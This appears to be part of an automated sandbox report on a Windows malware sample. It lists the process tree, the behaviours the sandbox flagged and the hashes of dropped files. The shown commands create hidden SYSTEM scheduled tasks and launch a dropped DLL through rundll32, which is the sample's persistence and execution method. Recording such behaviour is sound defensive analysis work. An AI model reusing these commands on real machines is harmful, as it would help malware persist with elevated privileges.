C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\aewiCMC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 05:24:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll\",#1 /YUsite_idAJG 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YGcJOiVocZfwUgdee"2⤵PID:436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"2⤵PID:4736
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll",#1 /YUsite_idAJG 3851181⤵PID:2768
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\hKfdPiVg\EyGBVHY.dll",#1 /YUsite_idAJG 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4352 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"3⤵PID:4960
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57b41975ea22f0f966fee56eb408575a5
SHA152659584014f8b18d154457e22e4b193b2eae2e3
SHA2568ad74a73a5f6fd1dcb1ccb179ce2d27795dfe9094dd13715c8d9bef3c816fcf5
SHA512518f23ae60e884a62fbe421ce1d68d3017b01bc347d6a7a7894a561d0f263f9fd60e05dc32883ad70a9becabf63c639044ca7a902b471d306303c636c5da414f
-
Filesize
2KB
MD576846a0729472885efc22a0aea0ad7db
SHA1066300eb9a9bb37932e7d493469ae2061fc77109
SHA256c1cb16d2af84d641ab3f6ac76d0acb56ae95d110484fc8461bc39c67bd1d00e5
SHA512d2344057e23a2d110a0b200edc3b65b0c8a40cf504c8485b9d655bc196bcb4955ca51c05ff92dca52c7350dfb227c22fc980529f21ec9ef96ceedd25b6a214dc
-
Filesize
2KB
MD5c11c890df632243cc3a57843dba04745
SHA134bccc1069fadee775775b1277e0018790f2c909
SHA25658a6ed8432fff7101552c0a253d2d5aacf94d72be2833da4b52416c833ed6020
SHA512550dbe74fe7b483572827aa2a559454592c339079f806d318d94839d71d1140e5a3b50c34d67c1a402d1944cafb0ffcb45c5a12ae6b48ef64b7dbed8ef5ae89f
-
Filesize
2KB
MD5aa8df0dba23dc740417a5b1978080699
SHA1779a1ff81b666df7f910340e1c752da47972ee76
SHA256c39b43f0e94aebd895a68df0a30b01a1b4b27f3afc2c2e5b8898a4e9b77040f5
SHA512abef3ac7adeada357e92bc2c52d25d8b1ae6d93bd1ae3b7e311e0b6fcf176288fe3ae01df8d93ee867d962ce1128ddaa45ea24a94fa262b0e60b192324271ab4
-
Filesize
2.5MB
MD54d1165402f9f90e5df03fb0aa780956d
SHA17abbd70ce215fa46ae527d7f73053f7d67227211
SHA256b0342b0b1d056fc581d0d07c9a077fdcfa079382e46e859d2178b50fb1a424ad
SHA512a41303344f2148387eb72230e2af5f2475d8c91ec96a298e5b7600fcdd5d0d07bd2af2603c074183e0aa8dee85e0fb7f0ec36d8437924c7d3654f895d84baed1
-
Filesize
2KB
MD58d731b2443ecebb1e879d4b74e8d4222
SHA12c7c7676f1826dc01bcdcc47c9109592dbbb598d
SHA2565f4eb8b5fb0c41cd3b88efcab8951aaa30998c29b312d5a0e9a4f34168a06775
SHA5123a771996d56c84782df5d71953b54b2ab8d85f17036494bcd13cb78c12feb7dd36d5fa1a5fdb6446da22a5bfba59e4b6a142058eaf7e3d0e580aa9007db3d188
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5a8ac56ba8e1716c58f7b1cd7f1881dc3
SHA17d55d0d9855edb088bd40b2a9185d52df2a655a1
SHA256fd0a7897b29bb511df34d115c561e48b5869e9112efa24df10c862191b79b76e
SHA5120bd001b7170ebe012ddd25dc3bd65127a3d509574c7c394f447ad7f445e059199dfb84f20ce8f3301c25ff351a1b16e375001e3f833d3c1da28f0e43f3541ff0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD56083300bc21c231a3e28a06480b4e0c2
SHA15af05f83ca95aa75e2605ab14d78c5a39237da95
SHA256d674b3f7367d5d1663cdc417d031bb5d0ef09cc82eb11e3afeba6613ff1ef912
SHA5127bd78028589a8985428f70c0a468b6c22d57e4ba0eb2c6929bc7e76ee06690fd448f0f13a5a5f8c6a8c9d752765fac6167cc98c4079e0d12a3c5445f5bf87cf0
-
Filesize
6.7MB
MD56248fde83e7929ff0561fd033b68d11c
SHA12ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA25666959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA51280bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5732ff4cecfb5a3558daf67b652aaaaef
SHA19a743435e6c612ed469449db47ba442e19451166
SHA25679626ca22daf36a549e4a192e9b96be879ff0b51879a12f9c62bbe0bfeb8d2ab
SHA5124bbe415e4242356d30c98b7856e74c73481db410243aa8bedb06d6c6b0f847131b801a51beccab962bc616fe5df3ecdb59b01dc8eaa30afc395e9ab9b8f3273f
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD5aebf4bf6752c28a76f012ad901a1b27e
SHA19609832f721f53d59f2d01b9d740649f44f965ea
SHA25673316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD545209db688518b9958ae0454ae5f4330
SHA173890462e4c3c27855e2a425b18c28d1c0c77a85
SHA2569044b84cd815839bad36b70c7609e77fde883c8bd5dccb48cc96a4086be0adaa
SHA5122e1b748c5c98e3f42805e9e0b8fe55c2d7da18ee8ca44fc075468fd93214106a26e0f9f7ad8339adeabb93ebdf4ba9e9754015fc964c6ec8456f6e7f0df3e513
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5cb05fea752fdc8d953aa1e59fb9a836a
SHA1d727eaff2eb5cd7a2153f1652f86f591cf03bb9c
SHA2563995a2e60f2c99b08a70e82a15a6a710153223f5cdeb7762108b424649cbc7bc
SHA51252688106e4748583426e7f6472964d4f23e33e499b91a2339adef0813351c276130ac4f9a2cb6874399ce251a78bde30168ddad03a01d494dc58bd56cd8e9450
-
Filesize
6.4MB
MD5db0e0228f220bd8fa3b45a0043744456
SHA1e287442ab5c21cab796c6893a34f0474820b6515
SHA2569d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763
-
Filesize
6KB
MD52eed991e6e31d306e68ef64d773d3e16
SHA127b5035255d679a7015d1a2e5bfcc5f124160689
SHA2563b839645035f3ad69591e7e9db4967a695877782e57703ee61d64eeb11be7fa1
SHA512d124006d52504010a7dd99599e58b026c28febe793e77609b6151152a7d3765cc52f3fec504680f7d9b08e183d3190858580c7035f9d95990292241535d40404